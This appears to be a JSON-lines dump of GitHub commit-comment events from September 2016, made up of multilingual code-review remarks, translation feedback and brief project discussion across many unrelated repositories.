{"id":"4545429140","type":"CommitCommentEvent","actor":{"login":"jingxlim"},"repo":{"name":"jalperin/markdown-resume"},"payload":{"comment":{"id":18976386,"position":null,"line":null,"path":null,"commit_id":"51f96522128c1a6a5a54610801cf7f401a853740","created_at":"2016-09-11T07:59:38Z","updated_at":"2016-09-11T07:59:38Z","body":"Hey Juan, I'm trying to figure out how to modify Craig's Markdown Resume Generator for my purposes when I stumbled onto your fork. I see that you've made many modifications thus far (really like what you turned the original templates into) and wonder if you would be willing to help me get started on mine's. I'm new to markdown, html, css, and to this whole GitHub thing so I hope you don't mind!\r\n\r\nChiefly, I am wondering how to make any modifications at all, and have the generator still run properly. From what I understood from the readme, it seems that I have to compile into a new build every time I make any modifications -- editing an existing template or creating a new one. Is this true? What is your workflow for editing the CSS templates?\r\n\r\nI also discovered some new elements in your repo and curious about them. What does altmetric-overrides.css do? What does the code above h1 of your md file do?\r\n\r\nWould love to hear from you. Thanks!"}},"created_at":"2016-09-11T07:59:38Z"}
{"id":"4545429886","type":"CommitCommentEvent","actor":{"login":"samdark"},"repo":{"name":"yiisoft-contrib/yiiframework.com"},"payload":{"comment":{"id":18976387,"position":null,"line":null,"path":null,"commit_id":"35ad912764cd1e4b73f2e3fe0ac2aa325502fa0e","created_at":"2016-09-11T08:00:14Z","updated_at":"2016-09-11T08:00:14Z","body":"Isn't it looking nice? :)"}},"created_at":"2016-09-11T08:00:14Z"}
{"id":"4545430298","type":"CommitCommentEvent","actor":{"login":"taishi-matsumura"},"repo":{"name":"saturday-programmers/BestStealReplica"},"payload":{"comment":{"id":18976388,"position":null,"line":null,"path":null,"commit_id":"e34ea55037e3f6f12fa0eea194f9eb4a49acca69","created_at":"2016-09-11T08:00:27Z","updated_at":"2016-09-11T08:00:27Z","body":"ずーっと気になっていた点を修正しました。\r\n自身のプロジェクト内であれば、\r\n`#include \"../map\"`\r\nのようにソースコードに直接相対pathを書くのが一般的ではありますが。"}},"created_at":"2016-09-11T08:00:27Z"}
{"id":"4545430606","type":"CommitCommentEvent","actor":{"login":"KcNirvana"},"repo":{"name":"KcNirvana/MA-XML-8.0-PORTUGUESE"},"payload":{"comment":{"id":18976389,"position":null,"line":null,"path":null,"commit_id":"c534171d377561b35a3c015e2f46a46ba399fac3","created_at":"2016-09-11T08:00:44Z","updated_at":"2016-09-11T08:00:44Z","body":"Não fales do que não sabes.\nLiga te a uma MeoWifi ou FonZon e nao te registes p veres o que significa essa string"}},"created_at":"2016-09-11T08:00:44Z"}
{"id":"4545436516","type":"CommitCommentEvent","actor":{"login":"ZoeYuhan"},"repo":{"name":"ZoeYuhan/zoeyuhan.github.com"},"payload":{"comment":{"id":18976393,"position":null,"line":null,"path":null,"commit_id":"5c2e4adb72b42ea05695399285fc3de6784a9b48","created_at":"2016-09-11T08:05:29Z","updated_at":"2016-09-11T08:05:29Z","body":"Intend to update "}},"created_at":"2016-09-11T08:05:29Z"}
{"id":"4545436733","type":"CommitCommentEvent","actor":{"login":"xeoneux"},"repo":{"name":"coding-blocks/Git_Tutorial"},"payload":{"comment":{"id":18976394,"position":null,"line":null,"path":null,"commit_id":"20c5aed9b46bf71f8b679a2ca0a3e890beefe7a7","created_at":"2016-09-11T08:05:41Z","updated_at":"2016-09-11T08:05:41Z","body":"LGTM! 😅"}},"created_at":"2016-09-11T08:05:41Z"}
{"id":"4545437068","type":"CommitCommentEvent","actor":{"login":"magnumripper"},"repo":{"name":"magnumripper/JohnTheRipper"},"payload":{"comment":{"id":18976396,"position":null,"line":null,"path":null,"commit_id":"e00ae89a0d46b3f0716d84060d0e59211df2ddda","created_at":"2016-09-11T08:06:00Z","updated_at":"2016-09-11T08:06:00Z","body":"I pushed c05776c for now.\r\n\r\n> May be --formats=no-dynamic,no-gpu and --formats=all,no-dynamic,no-cuda etc.?\r\n> And what about '--format=all,no-dynamic,no-sap*,no-@DES'?\r\n\r\nYes but I want this code simple stupid. A real \"parser\" is overkill. It's mostly for testing anyway."}},"created_at":"2016-09-11T08:06:00Z"}
{"id":"4545437155","type":"CommitCommentEvent","actor":{"login":"JJ"},"repo":{"name":"terceranexus6/SeteIai"},"payload":{"comment":{"id":18976397,"position":null,"line":null,"path":null,"commit_id":"f4696f0e614c59cc20aa1f027c1eafd7b775a213","created_at":"2016-09-11T08:06:07Z","updated_at":"2016-09-11T08:06:07Z","body":"Usa \"switch\" en vez de if encadenados: http://www.cplusplus.com/doc/tutorial/control/"}},"created_at":"2016-09-11T08:06:07Z"}
{"id":"4545438920","type":"CommitCommentEvent","actor":{"login":"JJ"},"repo":{"name":"terceranexus6/SeteIai"},"payload":{"comment":{"id":18976399,"position":null,"line":null,"path":null,"commit_id":"f4696f0e614c59cc20aa1f027c1eafd7b775a213","created_at":"2016-09-11T08:07:37Z","updated_at":"2016-09-11T08:07:37Z","body":"Es más, te podrías ahorrar `n` simplemente devolviendo la cadena correspondiente. Item más: declara todas las katas (o lo que sean) en un array `const` y te puedes ahorrar esa llamada a función, simplemente devolviendo el elemento correspondiente del array. "}},"created_at":"2016-09-11T08:07:37Z"}
{"id":"4545446445","type":"CommitCommentEvent","actor":{"login":"BatedUrGonnaDie"},"repo":{"name":"BatedUrGonnaDie/Autosplitters"},"payload":{"comment":{"id":18976408,"position":5,"line":3,"path":"Refunct/Refunct.asl","commit_id":"bda6812e4cfbb8056ed1a4f722dae226d7be309b","created_at":"2016-09-11T08:14:11Z","updated_at":"2016-09-11T08:14:11Z","body":"It seems that reset no longer has a static address which kind of sucks."}},"created_at":"2016-09-11T08:14:11Z"}
{"id":"4545447553","type":"CommitCommentEvent","actor":{"login":"vcunat"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":18976410,"position":37,"line":37,"path":"pkgs/development/compilers/llvm/3.9/clang/default.nix","commit_id":"15af9082ebeb2aece84e426daf7185715cfbb203","created_at":"2016-09-11T08:15:11Z","updated_at":"2016-09-11T08:15:11Z","body":"Fixed in a49cb9dcb."}},"created_at":"2016-09-11T08:15:11Z"}
{"id":"4545450354","type":"CommitCommentEvent","actor":{"login":"chiu0602"},"repo":{"name":"Ar1i/PokemonGo-Bot"},"payload":{"comment":{"id":18976413,"position":null,"line":null,"path":null,"commit_id":"3ac7c7a35ee1ba447dd5253fd8886df413f4c07e","created_at":"2016-09-11T08:17:23Z","updated_at":"2016-09-11T08:17:23Z","body":"issue persist"}},"created_at":"2016-09-11T08:17:23Z"}
{"id":"4545455408","type":"CommitCommentEvent","actor":{"login":"acrm"},"repo":{"name":"EkaSe/HelloWorld"},"payload":{"comment":{"id":18976419,"position":17,"line":33,"path":"HelloWorld/Program.cs","commit_id":"e38a88a2ce73ccf1c855b38b7ddbde96448af379","created_at":"2016-09-11T08:21:41Z","updated_at":"2016-09-11T08:21:41Z","body":"Лучше придерживаться camel-нотации для переменных"}},"created_at":"2016-09-11T08:21:41Z"}
{"id":"4545456699","type":"CommitCommentEvent","actor":{"login":"heicheng00"},"repo":{"name":"heicheng00/webChatRoom"},"payload":{"comment":{"id":18976421,"position":null,"line":null,"path":null,"commit_id":"ad5ed37d95eff17e401e5e395a8931f89ca86754","created_at":"2016-09-11T08:22:48Z","updated_at":"2016-09-11T08:22:48Z","body":"合并第一个分支到master分支"}},"created_at":"2016-09-11T08:22:48Z"}
{"id":"4545458967","type":"CommitCommentEvent","actor":{"login":"Lippe35"},"repo":{"name":"KcNirvana/MA-XML-8.0-PORTUGUESE"},"payload":{"comment":{"id":18976424,"position":null,"line":null,"path":null,"commit_id":"c534171d377561b35a3c015e2f46a46ba399fac3","created_at":"2016-09-11T08:24:48Z","updated_at":"2016-09-11T08:24:48Z","body":"Sei do que falo sim e nada tem haver com o exemplo que estás a referir que rico exemplo foste buscar..."}},"created_at":"2016-09-11T08:24:48Z"}
{"id":"4545459092","type":"CommitCommentEvent","actor":{"login":"glennholloway"},"repo":{"name":"cs50/harvard.cs50.debug"},"payload":{"comment":{"id":18976425,"position":5,"line":5,"path":"bin/debug50","commit_id":"34ca117cdd919db4b6eb1f2861527592c6f5e09e","created_at":"2016-09-11T08:24:55Z","updated_at":"2016-09-11T08:24:55Z","body":"I kinda line the naked `$0` way, and I think it's customary. Its advantage is that it shows the user exactly what command needs to be issued from the point at which her original command was issued. Doesn't depend on her realizing that the simplification of the command (replaceing it with the base name) int the usage template isn't mandatory (and may not even work)."}},"created_at":"2016-09-11T08:24:55Z"}
{"id":"4545460331","type":"CommitCommentEvent","actor":{"login":"The-Penguin"},"repo":{"name":"404rq/GTW-RPG"},"payload":{"comment":{"id":18976429,"position":null,"line":null,"path":null,"commit_id":"0e91cdcbf7d34406e8795145031231ec7254e321","created_at":"2016-09-11T08:25:58Z","updated_at":"2016-09-11T08:25:58Z","body":"I had to revert these changes due to complaints in game about health issues. If you commit this kind of changes make it a setting instead (either a variable in GTWcore/data/settings.xml or as a variable in the top of the file) so people can choose their preferences without changing the existing environment, you should also test on a local server before commit to avoid breaking things in the live environment. The master branch must always work.\r\n\r\nAslo, when you alter a line like this:\r\n```lua\r\nfunction_a(function_b(function_c(var1, var2, ...)))\r\n```\r\n\r\nDo not change it to this:\r\n```lua\r\nfunction_a ( function_b ( function_c ( var1, var2, ... ) ) )\r\n```\r\n\r\nIt doesn't look good when multiple developers works on the same file and all have their own way of writing."}},"created_at":"2016-09-11T08:25:58Z"}
{"id":"4545462471","type":"CommitCommentEvent","actor":{"login":"Lippe35"},"repo":{"name":"KcNirvana/MA-XML-8.0-PORTUGUESE"},"payload":{"comment":{"id":18976432,"position":null,"line":null,"path":null,"commit_id":"c534171d377561b35a3c015e2f46a46ba399fac3","created_at":"2016-09-11T08:27:52Z","updated_at":"2016-09-11T08:27:52Z","body":"Mas como tens a mania que sabes mais que os outros e espalhas sempre a tua sabedoria sobre os outros dás sempre estas respostas... Olha que em certas strings enganaste ou pensas que sabes e eu vou atrás corrigilas e nunca dou lições de moral "}},"created_at":"2016-09-11T08:27:52Z"}
{"id":"4545462995","type":"CommitCommentEvent","actor":{"login":"summerblue"},"repo":{"name":"rang9527/laravel-docs"},"payload":{"comment":{"id":18976435,"position":null,"line":null,"path":null,"commit_id":"24c16a764e6dccf9bc83b33fd93de88cac580dc3","created_at":"2016-09-11T08:28:17Z","updated_at":"2016-09-11T08:28:17Z","body":"可以把头像换成这个链接：\r\n\r\n    https://avatars2.githubusercontent.com/u/10138783?v=3&s=132"}},"created_at":"2016-09-11T08:28:17Z"}
{"id":"4545464211","type":"CommitCommentEvent","actor":{"login":"burukinsd"},"repo":{"name":"egorsh0/.Net"},"payload":{"comment":{"id":18976438,"position":20,"line":20,"path":"Taxi/Taxi/Program.cs","commit_id":"e2ca03e6a5b21ecb8acac7ccd4b6ab224aaa2b21","created_at":"2016-09-11T08:29:23Z","updated_at":"2016-09-11T08:29:23Z","body":"Лучше размеры изменений вынести в переменный, как и начальные суммы, а то вызов конвертов по два раза на итерацию цикла не очень"}},"created_at":"2016-09-11T08:29:23Z"}
{"id":"4545465250","type":"CommitCommentEvent","actor":{"login":"panzergame"},"repo":{"name":"UPBGE/blender"},"payload":{"comment":{"id":18976440,"position":5,"line":61,"path":"source/gameengine/Device/DEV_JoystickEvents.cpp","commit_id":"85ddb546fbafca6d79967826ba50469d0ea01451","created_at":"2016-09-11T08:30:16Z","updated_at":"2016-09-11T08:30:16Z","body":"@lordloki : Why did you used the ($array) syntax ?\r\nIt's possible to use bools for addrem ?"}},"created_at":"2016-09-11T08:30:16Z"}
{"id":"4545465833","type":"CommitCommentEvent","actor":{"login":"burukinsd"},"repo":{"name":"egorsh0/.Net"},"payload":{"comment":{"id":18976443,"position":33,"line":33,"path":"Taxi/Taxi/Program.cs","commit_id":"e2ca03e6a5b21ecb8acac7ccd4b6ab224aaa2b21","created_at":"2016-09-11T08:30:44Z","updated_at":"2016-09-11T08:30:44Z","body":"Вот это лишнее, таксист не принимает цену Пети в таком сулчае, он все равно думает, что меньше, но мне кажется не здесь проблема была."}},"created_at":"2016-09-11T08:30:44Z"}
{"id":"4545466239","type":"CommitCommentEvent","actor":{"login":"panzergame"},"repo":{"name":"UPBGE/blender"},"payload":{"comment":{"id":18976444,"position":8,"line":403,"path":"source/gameengine/Ketsji/KX_KetsjiEngine.cpp","commit_id":"85ddb546fbafca6d79967826ba50469d0ea01451","created_at":"2016-09-11T08:31:08Z","updated_at":"2016-09-11T08:31:08Z","body":"There's an advantage to iterate only on the front of the list instead of iterating on all joystick and then initialize the addrem array before ?"}},"created_at":"2016-09-11T08:31:08Z"}
{"id":"4545467640","type":"CommitCommentEvent","actor":{"login":"sirmordred"},"repo":{"name":"msm7x30/android_hardware_qcom_display"},"payload":{"comment":{"id":18976449,"position":null,"line":null,"path":null,"commit_id":"beb3d408ff05d9748a8499f789941c7bde3b513a","created_at":"2016-09-11T08:32:17Z","updated_at":"2016-09-11T08:32:17Z","body":"@arco  i already updated all the device specific trees for cm13 for you\r\n\r\nBut i didnt update against  >may changes"}},"created_at":"2016-09-11T08:32:17Z"}
{"id":"4545467844","type":"CommitCommentEvent","actor":{"login":"panzergame"},"repo":{"name":"UPBGE/blender"},"payload":{"comment":{"id":18976450,"position":17,"line":405,"path":"source/gameengine/Ketsji/KX_KetsjiEngine.cpp","commit_id":"85ddb546fbafca6d79967826ba50469d0ea01451","created_at":"2016-09-11T08:32:30Z","updated_at":"2016-09-11T08:32:30Z","body":"@lordloki : I think you can reuse this function in initGameLogicPythonBinding after setting the \"joystick\" list to bge.logic."}},"created_at":"2016-09-11T08:32:30Z"}
{"id":"4545468443","type":"CommitCommentEvent","actor":{"login":"burukinsd"},"repo":{"name":"egorsh0/.Net"},"payload":{"comment":{"id":18976451,"position":12,"line":38,"path":"Taxi/Taxi/Program.cs","commit_id":"c3d83a424a0f16edebe58660522b07644523de38","created_at":"2016-09-11T08:32:55Z","updated_at":"2016-09-11T08:32:55Z","body":"Это лишний шаг торгов, он не нужен, не договорились, пошлои на следующую итерацию."}},"created_at":"2016-09-11T08:32:55Z"}
{"id":"4545468788","type":"CommitCommentEvent","actor":{"login":"sirmordred"},"repo":{"name":"msm7x30/android_hardware_qcom_display"},"payload":{"comment":{"id":18976453,"position":null,"line":null,"path":null,"commit_id":"beb3d408ff05d9748a8499f789941c7bde3b513a","created_at":"2016-09-11T08:33:09Z","updated_at":"2016-09-11T08:33:09Z","body":"So we might be lost some upstream changes but it shouldnt be so hard to sync to upstream"}},"created_at":"2016-09-11T08:33:09Z"}
{"id":"4545472926","type":"CommitCommentEvent","actor":{"login":"WickedShell"},"repo":{"name":"ArduPilot/ardupilot"},"payload":{"comment":{"id":18976456,"position":5,"line":86,"path":"ArduPlane/arming_checks.cpp","commit_id":"9b83781b4f55f9c558eb901bf780012f4a67631c","created_at":"2016-09-11T08:36:25Z","updated_at":"2016-09-11T08:36:25Z","body":"I had not considered this difference, good catch, it's a shame we made it to release without seeing it though!"}},"created_at":"2016-09-11T08:36:25Z"}
{"id":"4545473778","type":"CommitCommentEvent","actor":{"login":"zzyyloves"},"repo":{"name":"zzyyloves/node-blog"},"payload":{"comment":{"id":18976458,"position":null,"line":null,"path":null,"commit_id":"4f77ed31127a1a19640ad7c80b18d6f5de5fe7cd","created_at":"2016-09-11T08:37:08Z","updated_at":"2016-09-11T08:37:08Z","body":"first commit"}},"created_at":"2016-09-11T08:37:08Z"}
{"id":"4545474895","type":"CommitCommentEvent","actor":{"login":"Clarmy"},"repo":{"name":"Clarmy/Python-Atmospheric-Science"},"payload":{"comment":{"id":18976459,"position":null,"line":null,"path":null,"commit_id":"cb3d8d38036259b303cbe445176402195b6b5bac","created_at":"2016-09-11T08:38:07Z","updated_at":"2016-09-11T08:38:07Z","body":"读取气象数据"}},"created_at":"2016-09-11T08:38:07Z"}
{"id":"4545476197","type":"CommitCommentEvent","actor":{"login":"lucabrivio"},"repo":{"name":"lucabrivio/Stockfish"},"payload":{"comment":{"id":18976462,"position":null,"line":null,"path":null,"commit_id":"a8e22ea5e051f07febc19aba859ca431909cc8d6","created_at":"2016-09-11T08:39:13Z","updated_at":"2016-09-11T08:39:13Z","body":"@snicolet Clearly now that the patch is correct the values are way off the mark. :-)\r\nI hope to be able to tune locally before any new tests!"}},"created_at":"2016-09-11T08:39:13Z"}
{"id":"4545476999","type":"CommitCommentEvent","actor":{"login":"t-rex600"},"repo":{"name":"LiquidDark-OMS/android_packages_apps_Settings"},"payload":{"comment":{"id":18976463,"position":null,"line":null,"path":null,"commit_id":"d58b08cc12de194189cd45a4e6d0b95daa92d942","created_at":"2016-09-11T08:39:59Z","updated_at":"2016-09-11T08:39:59Z","body":" - Prevent external tiles from system apps\r\n - Don't let user settings run\r\n - Disable help"}},"created_at":"2016-09-11T08:39:59Z"}
{"id":"4545478103","type":"CommitCommentEvent","actor":{"login":"summerblue"},"repo":{"name":"RystLee/laravel-docs"},"payload":{"comment":{"id":18976465,"position":41,"line":30,"path":"csrf.md","commit_id":"8d10af4885229f63cea0ceaecd6a2ce9dda91e88","created_at":"2016-09-11T08:40:47Z","updated_at":"2016-09-11T08:40:47Z","body":"    Typically, you should place these kinds of routes outside of the `web` middleware group that the `RouteServiceProvider` applies to all routes in the `routes/web.php` file. However, you may also exclude the routes by adding their URIs to the `$except` property of the `VerifyCsrfToken` middleware:\r\n\r\n这一句有点翻译的有点晦涩，请参考以下：\r\n    \r\n    一般的，你不应该把这种类型的路由写在  `routes/web.php` 文件中，因为此文件的所有路由在 `RouteServiceProvider` 中被绑定到 `web` 中间件组中（`web` 中间件组下的所有路由默认会进行 `VerifyCsrfToken` 过滤）。不过如果一定要这么做，你也可以通过在 `VerifyCsrfToken` 中间件中增加 `$except` 属性来排除这种路由。"}},"created_at":"2016-09-11T08:40:47Z"}
{"id":"4545478679","type":"CommitCommentEvent","actor":{"login":"sprewell20051116"},"repo":{"name":"sprewell20051116/SwiftExercise"},"payload":{"comment":{"id":18976466,"position":null,"line":null,"path":null,"commit_id":"38e566e184c69eadc16f5ac27b65807e3118b082","created_at":"2016-09-11T08:41:15Z","updated_at":"2016-09-11T08:41:15Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;1cDqlwu4&#x2F;27-proj-01-counter\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> [Proj.] 01. Counter</a>"}},"created_at":"2016-09-11T08:41:15Z"}
{"id":"4545478959","type":"CommitCommentEvent","actor":{"login":"burukinsd"},"repo":{"name":"4poKer/.NetLabs"},"payload":{"comment":{"id":18976468,"position":36,"line":36,"path":"1263Elections/Program.cs","commit_id":"67650ec8358c36375308261a628f438048ae418c","created_at":"2016-09-11T08:41:29Z","updated_at":"2016-09-11T08:41:29Z","body":"Уже и \"%\" впихнул бы в первый паремтр, зачем + дергать?"}},"created_at":"2016-09-11T08:41:29Z"}
{"id":"4545482966","type":"CommitCommentEvent","actor":{"login":"burukinsd"},"repo":{"name":"4poKer/.NetLabs"},"payload":{"comment":{"id":18976469,"position":19,"line":19,"path":"1567SMS/Program.cs","commit_id":"67650ec8358c36375308261a628f438048ae418c","created_at":"2016-09-11T08:44:43Z","updated_at":"2016-09-11T08:44:43Z","body":"Можно импользовать метод indexOf у строки, по времени выйгрыш не даст, но код почитабельней станет."}},"created_at":"2016-09-11T08:44:43Z"}
{"id":"4545483007","type":"CommitCommentEvent","actor":{"login":"bugdanov"},"repo":{"name":"doxel/doxel-angular"},"payload":{"comment":{"id":18976470,"position":null,"line":null,"path":null,"commit_id":"6d862613e56858a9214ab47626cfcfb34f7d8818","created_at":"2016-09-11T08:44:45Z","updated_at":"2016-09-11T08:44:45Z","body":"fix issue #11 "}},"created_at":"2016-09-11T08:44:45Z"}
{"id":"4545483129","type":"CommitCommentEvent","actor":{"login":"summerblue"},"repo":{"name":"dinghua/laravel-docs"},"payload":{"comment":{"id":18976471,"position":43,"line":28,"path":"contracts.md","commit_id":"97b97e36461e701607b695a045bb5b92681edccd","created_at":"2016-09-11T08:44:49Z","updated_at":"2016-09-11T08:44:49Z","body":"这里的 `{tip}` 无需翻译，后面会使用 markdown 进行解析的，是个自定义的语法。"}},"created_at":"2016-09-11T08:44:49Z"}
{"id":"4545486425","type":"CommitCommentEvent","actor":{"login":"rurban"},"repo":{"name":"rurban/perl-compiler"},"payload":{"comment":{"id":18976474,"position":22,"line":5212,"path":"lib/B/C.pm","commit_id":"4c3723da014b9142a871d604472c6bfd8b1ea625","created_at":"2016-09-11T08:47:27Z","updated_at":"2016-09-11T08:47:27Z","body":"Unfortunately we cannot cache the initial get_cv(name) as the first uses flag 0 (no add), and the 2nd forces an add (i.e. XS or stub). So we really have to call get_cv twice, first with 0, then with GV_ADD."}},"created_at":"2016-09-11T08:47:27Z"}
{"id":"4545487344","type":"CommitCommentEvent","actor":{"login":"burukinsd"},"repo":{"name":"4poKer/.NetLabs"},"payload":{"comment":{"id":18976475,"position":7,"line":7,"path":"1585Penguins/Program.cs","commit_id":"67650ec8358c36375308261a628f438048ae418c","created_at":"2016-09-11T08:48:14Z","updated_at":"2016-09-11T08:48:14Z","body":"Здесь клево бы подошел Dictionary, почитай про него, но так тоже норм, хотя в конце приходится быть аккарутным."}},"created_at":"2016-09-11T08:48:14Z"}
{"id":"4545487738","type":"CommitCommentEvent","actor":{"login":"pandabao"},"repo":{"name":"pandabao/tushare"},"payload":{"comment":{"id":18976476,"position":null,"line":null,"path":null,"commit_id":"62d46b85ed1c4c66519746d2feb851a9224ce993","created_at":"2016-09-11T08:48:35Z","updated_at":"2016-09-11T08:48:35Z","body":"第二次"}},"created_at":"2016-09-11T08:48:35Z"}
{"id":"4545487815","type":"CommitCommentEvent","actor":{"login":"summerblue"},"repo":{"name":"dinghua/laravel-docs"},"payload":{"comment":{"id":18976477,"position":56,"line":37,"path":"contracts.md","commit_id":"97b97e36461e701607b695a045bb5b92681edccd","created_at":"2016-09-11T08:48:38Z","updated_at":"2016-09-11T08:48:38Z","body":"5.2 对这一块有可参照的翻译，请保持一致，下面也麻烦一并检查下 http://laravel-china.org/docs/5.2/contracts#低耦合"}},"created_at":"2016-09-11T08:48:38Z"}
{"id":"4545488930","type":"CommitCommentEvent","actor":{"login":"okitec"},"repo":{"name":"drt2016/TanzschulApp"},"payload":{"comment":{"id":18976478,"position":11,"line":3,"path":"README.md","commit_id":"f94e0c90c7987ab19a4f7122ef51e22ddab518a1","created_at":"2016-09-11T08:49:30Z","updated_at":"2016-09-11T08:49:30Z","body":"Being from Germany doesn't *excuse* this, it merely serves as one reason. Just say that you're from Germany and that you use weird expressions and some German terms in your source. This should be at the bottom of the README, I'd say."}},"created_at":"2016-09-11T08:49:30Z"}
{"id":"4545488940","type":"CommitCommentEvent","actor":{"login":"bradymiller"},"repo":{"name":"juggernautsei/openemr"},"payload":{"comment":{"id":18976479,"position":9,"line":9,"path":"hservice/init_autoloader.php","commit_id":"0cbc00e1cb70d7f57f720baf766b1558fda4f351","created_at":"2016-09-11T08:49:31Z","updated_at":"2016-09-11T08:49:31Z","body":"Note we already have Zend in the codebase.\r\nI'm gonna have Scott look at this to see if there's a better way to incorporate the Zend that already exists in the codebase."}},"created_at":"2016-09-11T08:49:31Z"}
{"id":"4545489070","type":"CommitCommentEvent","actor":{"login":"yvxiang"},"repo":{"name":"baidu/bfs"},"payload":{"comment":{"id":18976480,"position":5,"line":16,"path":"src/README.md","commit_id":"0c2989ebbfcb75db0ebbee782da7694a1dafaf42","created_at":"2016-09-11T08:49:37Z","updated_at":"2016-09-11T08:49:37Z","body":"这东西已经不存在了"}},"created_at":"2016-09-11T08:49:37Z"}
{"id":"4545490054","type":"CommitCommentEvent","actor":{"login":"bradymiller"},"repo":{"name":"juggernautsei/openemr"},"payload":{"comment":{"id":18976482,"position":16,"line":16,"path":"hservice/index.php","commit_id":"0cbc00e1cb70d7f57f720baf766b1558fda4f351","created_at":"2016-09-11T08:50:25Z","updated_at":"2016-09-11T08:50:25Z","body":"use @author tag"}},"created_at":"2016-09-11T08:50:25Z"}
{"id":"4545490228","type":"CommitCommentEvent","actor":{"login":"bradymiller"},"repo":{"name":"juggernautsei/openemr"},"payload":{"comment":{"id":18976483,"position":17,"line":17,"path":"hservice/server.php","commit_id":"0cbc00e1cb70d7f57f720baf766b1558fda4f351","created_at":"2016-09-11T08:50:33Z","updated_at":"2016-09-11T08:50:33Z","body":"use @author tag"}},"created_at":"2016-09-11T08:50:33Z"}
{"id":"4545490768","type":"CommitCommentEvent","actor":{"login":"okitec"},"repo":{"name":"drt2016/TanzschulApp"},"payload":{"comment":{"id":18976486,"position":13,"line":5,"path":"README.md","commit_id":"f94e0c90c7987ab19a4f7122ef51e22ddab518a1","created_at":"2016-09-11T08:51:03Z","updated_at":"2016-09-11T08:51:03Z","body":"*Seminararbeit*. Also, people can look this up if they want. Just stick to the point and tell me why I should use your app."}},"created_at":"2016-09-11T08:51:03Z"}
{"id":"4545492964","type":"CommitCommentEvent","actor":{"login":"okitec"},"repo":{"name":"drt2016/TanzschulApp"},"payload":{"comment":{"id":18976488,"position":15,"line":7,"path":"README.md","commit_id":"f94e0c90c7987ab19a4f7122ef51e22ddab518a1","created_at":"2016-09-11T08:52:51Z","updated_at":"2016-09-11T08:52:51Z","body":"... to help people **find** ...\r\n\r\nApart from that, the *Have you ever [...]* would make for a great introduction."}},"created_at":"2016-09-11T08:52:51Z"}
{"id":"4545493483","type":"CommitCommentEvent","actor":{"login":"bradymiller"},"repo":{"name":"juggernautsei/openemr"},"payload":{"comment":{"id":18976490,"position":20,"line":20,"path":"hservice/server.php","commit_id":"0cbc00e1cb70d7f57f720baf766b1558fda4f351","created_at":"2016-09-11T08:53:12Z","updated_at":"2016-09-11T08:53:12Z","body":"Place security flags:\r\n``````\r\n$fake_register_globals=false;\r\n$sanitize_all_escapes=true;"}},"created_at":"2016-09-11T08:53:12Z"}
{"id":"4545495351","type":"CommitCommentEvent","actor":{"login":"bradymiller"},"repo":{"name":"juggernautsei/openemr"},"payload":{"comment":{"id":18976492,"position":35,"line":35,"path":"hservice/server.php","commit_id":"0cbc00e1cb70d7f57f720baf766b1558fda4f351","created_at":"2016-09-11T08:54:46Z","updated_at":"2016-09-11T08:54:46Z","body":"Isn't all the above already done by including interface/globals.php above?"}},"created_at":"2016-09-11T08:54:46Z"}
{"id":"4545496369","type":"CommitCommentEvent","actor":{"login":"bradymiller"},"repo":{"name":"juggernautsei/openemr"},"payload":{"comment":{"id":18976494,"position":109,"line":109,"path":"hservice/server.php","commit_id":"0cbc00e1cb70d7f57f720baf766b1558fda4f351","created_at":"2016-09-11T08:55:32Z","updated_at":"2016-09-11T08:55:32Z","body":"shouldn't need $sqlconf"}},"created_at":"2016-09-11T08:55:32Z"}
{"id":"4545496884","type":"CommitCommentEvent","actor":{"login":"okitec"},"repo":{"name":"drt2016/TanzschulApp"},"payload":{"comment":{"id":18976495,"position":16,"line":8,"path":"README.md","commit_id":"f94e0c90c7987ab19a4f7122ef51e22ddab518a1","created_at":"2016-09-11T08:56:01Z","updated_at":"2016-09-11T08:56:01Z","body":"The **intention** of my app is **to** revolutionize ~~the obsolete methods by speeding up~~ the searching process ~~to find~~ **for finding** a dancing partner.\r\n\r\n"}},"created_at":"2016-09-11T08:56:01Z"}
{"id":"4545497250","type":"CommitCommentEvent","actor":{"login":"bradymiller"},"repo":{"name":"juggernautsei/openemr"},"payload":{"comment":{"id":18976497,"position":142,"line":142,"path":"hservice/server.php","commit_id":"0cbc00e1cb70d7f57f720baf766b1558fda4f351","created_at":"2016-09-11T08:56:22Z","updated_at":"2016-09-11T08:56:22Z","body":"Should not need to set up a mysqli connection. That has already been done when included interface/globals.php above. "}},"created_at":"2016-09-11T08:56:22Z"}
{"id":"4545500106","type":"CommitCommentEvent","actor":{"login":"hintss"},"repo":{"name":"tumblr/policy"},"payload":{"comment":{"id":18976501,"position":null,"line":null,"path":null,"commit_id":"10a83db20735bd930f6dc2a6ab4dca4299b800bf","created_at":"2016-09-11T08:58:49Z","updated_at":"2016-09-11T08:58:49Z","body":"Only the green part is part of this diff\n\nOn Sat, Sep 10, 2016, 20:04 bokatan <notifications@github.com> wrote:\n\n> What do you mean? The statement is clear:\n>\n> You also agree that you will respect the intellectual property rights of\n> others\n>\n> If you are referring to the green part, that was not there for my OP. As\n> far as Tumblr posting ads. Social media money making is the way it is. I\n> hate that their ads have sound, but oh well.\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/tumblr/policy/commit/10a83db20735bd930f6dc2a6ab4dca4299b800bf#commitcomment-18975856>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAzxIzWNDlJzcO21jZbxvCu44pBcnE-5ks5qo2_TgaJpZM4J4Zx8>\n> .\n>\n"}},"created_at":"2016-09-11T08:58:49Z"}
{"id":"4545500249","type":"CommitCommentEvent","actor":{"login":"bradymiller"},"repo":{"name":"juggernautsei/openemr"},"payload":{"comment":{"id":18976502,"position":145,"line":145,"path":"hservice/server.php","commit_id":"0cbc00e1cb70d7f57f720baf766b1558fda4f351","created_at":"2016-09-11T08:58:58Z","updated_at":"2016-09-11T08:58:58Z","body":"Do not use mysqli_query function.\r\nuse standard OpenEMR sqlInsert() function and use sql binding."}},"created_at":"2016-09-11T08:58:58Z"}
